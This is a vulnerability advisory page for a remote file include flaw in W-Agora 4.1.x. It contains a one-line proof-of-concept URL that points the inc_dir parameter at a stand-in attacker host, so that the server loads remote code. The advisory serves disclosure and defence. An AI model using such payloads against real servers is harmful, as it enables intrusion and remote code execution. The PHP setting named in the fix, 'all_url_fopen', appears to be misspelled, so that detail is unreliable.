W-Agora Remote File Include Vulnerability
BID:4977
Info
W-Agora Remote File Include Vulnerability
| Bugtraq ID: | 4977 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 10 2002 12:00AM |
| Updated: | Jun 10 2002 12:00AM |
| Credit: | Credited to "Frog Man" <[email protected]>. |
| Vulnerable: |
Marc Druilhe W-Agora 4.1.3 Marc Druilhe W-Agora 4.1.2 Marc Druilhe W-Agora 4.1.1 |
| Not Vulnerable: | |
Exploit / POC
W-Agora Remote File Include Vulnerability
There is no exploit code required. The following proof of concept was provided by "Frog Man" <[email protected]>.
http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
There is no exploit code required. The following proof of concept was provided by "Frog Man" <[email protected]>.
http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
Solution / Fix
W-Agora Remote File Include Vulnerability
Solution:
Certain PHP configurations may limit exposure to this issue. This issue may be mitigated by setting 'all_url_fopen' to 'off' when configuring PHP.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Certain PHP configurations may limit exposure to this issue. This issue may be mitigated by setting 'all_url_fopen' to 'off' when configuring PHP.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.